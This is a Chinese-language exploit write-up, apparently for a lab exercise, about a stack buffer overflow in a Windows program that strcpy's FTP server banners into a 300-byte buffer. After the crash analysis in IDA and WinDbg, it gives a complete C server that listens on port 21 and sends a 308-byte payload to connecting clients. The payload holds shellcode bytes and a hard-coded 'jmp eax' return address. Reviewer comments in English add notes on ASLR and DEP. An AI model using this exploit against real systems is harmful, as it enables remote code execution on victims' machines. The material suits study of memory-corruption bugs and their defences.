国际惯例,下载程序后先拖入IDA分析,看了半天也没看出个所以然。
于是直接发送超长数据,看程序会不会崩。
FTP服务器在接收完USER和PASS之后,会发送Welcome信息。直觉告诉我,这儿应该会崩,于是写个socket程序,发送长字符串,程序果然崩了。
然后用windbg载入,用kn命令看一下调用堆栈。尝试了几次后,找到了关键函数sub_4013D0。
这个函数先是创建socket,然后连接远程FTP服务器,之后会调用recv()函数。而且在每次调用recv()之后,都会将接收数据的buf作为参数,调用sub_401032。这个函数就是被覆盖返回地址的函数了。
进入sub_401032后,程序申请了一个0x12C字节的空间
Dest = byte ptr -12Ch
然后将其作为Dest,将前面传入的buf作为Source,调用strcpy()函数。
.text:0040126E mov eax, [ebp+Source]
.text:00401271 push eax ; Source
.text:00401272 lea ecx, [ebp+Dest]
.text:00401278 push ecx ; Dest
.text:00401279 call _strcpy
由于strcpy()不检查缓冲区边界,造成溢出。
找到溢出点之后,接下来就要构造缓冲区,进行利用了。
strcpy函数返回后,eax作为返回值存放的是Dest的地址,因此可以用它来做跳板。
---------------------
shellcode 共计0x12C字节
junk
---------------------
ebp
RetAddr <-- 填充为7c8f6571,即jmp eax
由于每次调用recv()接收数据之后,都会调用sub_401032,因此可以在接受连接发送banner的时候,直接发送shellcode过去。
#include <stdio.h>
#include <stdlib.h>
#include <WinSock.h>
#include <string.h>
#pragma comment(lib, "ws2_32.lib")
#define PORT 21
#define BACKLOG 10
#define LEN 308
/* Author-supplied payload bytes, reproduced unmodified and not decoded in this
 * review. main() places this array at the front of its LEN-byte buffer and uses
 * strlen(buf) to find where it ends, so the array must stay NUL-free and shorter
 * than LEN. A fixed byte sequence like this is also what a network or host
 * signature for this particular sample would match on. */
char buf[] =
"\xFC\x68\xC9\xBC\xA6\x6B\x68\x63\x89\xD1\x4F\x8B"
"\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x33\xD2"
"\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C\x8B\x09"
"\x8B\x51\x18\x8B\x52\x34\x80\xFA\x33\x74\x02\x8B"
"\x09\x8B\x69\x08\xAD\x60\x8B\x45\x3C\x8B\x4C\x05"
"\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF\x47\x8B"
"\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A\xC4\x74\x08"
"\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C"
"\x75\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B"
"\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61"
"\x3D\xC9\xBC\xA6\x6B\x75\xB5\x33\xDB\x33\xC0\x53"
"\x40\x3C\x20\x75\xFA\x33\xDB\x53\xBB\x63\x61\x6C"
"\x63\x53\x8B\xCC\x33\xC0\x54\x54\x50\x50\x50\x54"
"\x50\x50\x51\x50\xFF\x57\xFC\x33\xDB\x53\xFF\x57"
"\xF8";
/*
 * Initialise Winsock 2.2 for this process.
 *
 * Returns 0 on success, 1 if WSAStartup() fails or if the negotiated
 * version is not exactly 2.2. In the version-mismatch case the library
 * is released again with WSACleanup() before returning; in the
 * WSAStartup()-failure case nothing was acquired, so nothing is released.
 */
int InitSocket()
{
    WSADATA wsaData;
    const WORD requested = MAKEWORD(2, 2);
    int rc = WSAStartup(requested, &wsaData);

    if (rc != 0) {
        printf("WSAStartup failed with error: %d\n", rc);
        return 1;
    }

    /* Both halves of wVersion must be 2 for a usable 2.2 stack. */
    if (LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2) {
        printf("Could not find a usable version of Winsock.dll\n");
        WSACleanup();
        return 1;
    }

    return 0;
}
/*
 * Harness from the write-up above: binds PORT, accepts one client (the analysed
 * program, which connects out to an FTP server on port 21 according to the
 * text), sends the LEN-byte buffer once, then closes both sockets. Every
 * failure prints a message and terminates the process.
 */
int main()
{
SOCKET sockServer;
SOCKET sockClient;
SOCKADDR_IN ServerAddr;
SOCKADDR_IN ClientAddr;
int sin_size;
/* LEN-byte buffer laid out as the diagram above describes: 0x90 filler, buf[]
 * at the front, and the last 4 bytes landing on sub_401032's saved return
 * address (its Dest is 0x12C = 300 bytes). */
char shellcode[LEN];
memset(shellcode, 0x90, LEN);
/* strcpy() also copies buf's terminating NUL; the next line puts 0x90 back
 * there. This relies on strlen(buf) + 1 <= LEN (169 vs. 308 as listed) --
 * growing buf[] without raising LEN would overflow shellcode[] itself. */
strcpy(shellcode, buf);
shellcode[strlen(buf)] = '\x90';
/* Hard-coded absolute address (the write-up identifies it as a jmp eax).
 * Storing through an int* into a char array is a strict-aliasing violation in
 * C; memcpy() of a 4-byte value is the conforming form. Defender note: a fixed
 * address like this is precisely what ASLR invalidates, and DEP prevents the
 * stack-resident Dest buffer from being executed at all. */
*((int *)(shellcode+LEN-4)) = 0x7c8f6571; // jmp eax
ServerAddr.sin_family = AF_INET;
ServerAddr.sin_port = htons(PORT);
ServerAddr.sin_addr.S_un.S_addr = INADDR_ANY;
memset(&(ServerAddr.sin_zero), 0, sizeof(ServerAddr.sin_zero));
/* NOTE(review): return value ignored -- if WSAStartup() failed, socket() below
 * fails instead and the real cause is never reported. */
InitSocket();
if ((sockServer = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
{
printf("[-] Create socket failed.\n");
exit(1);
}
printf("[+] Create socket succeed.\n");
/* `sockaddr` without `struct` (here and in accept() below) compiles only as
 * C++ or with a typedef not shown in this file; plain C wants
 * (struct sockaddr *) or (SOCKADDR *). */
if (bind(sockServer, (sockaddr *)&ServerAddr, sizeof(ServerAddr)) == -1)
{
printf("[-] Bind port failed.\n");
exit(1);
}
if (listen(sockServer, BACKLOG) == -1)
{
printf("[-] listen failed.\n");
exit(1);
}
printf("[+] Listening port %d...\n", PORT);
/* accept() writes the peer address length back through sin_size. */
sin_size = sizeof(SOCKADDR_IN);
sockClient = accept(sockServer, (sockaddr *)&ClientAddr, &sin_size);
if (sockClient == INVALID_SOCKET)
{
printf("[-] accept failed.\n");
exit(1);
}
printf("[+] Receive connect from %s.\n", inet_ntoa(ClientAddr.sin_addr));
printf("[+] Sending shellcode...\n");
/* A single send() of the whole buffer; a short send is not detected here. */
if (send(sockClient, shellcode, LEN, 0) == -1)
{
printf("[-] Send shellcode failed.\n");
/* NOTE(review): exit(0) reports success on a failed send(); every other
 * error path above uses exit(1). */
exit(0);
}
printf("[+] Done.\n");
closesocket(sockClient);
closesocket(sockServer);
WSACleanup();
return 0;
}
利用程序很简单,监听21端口,收到连接就发送shellcode过去。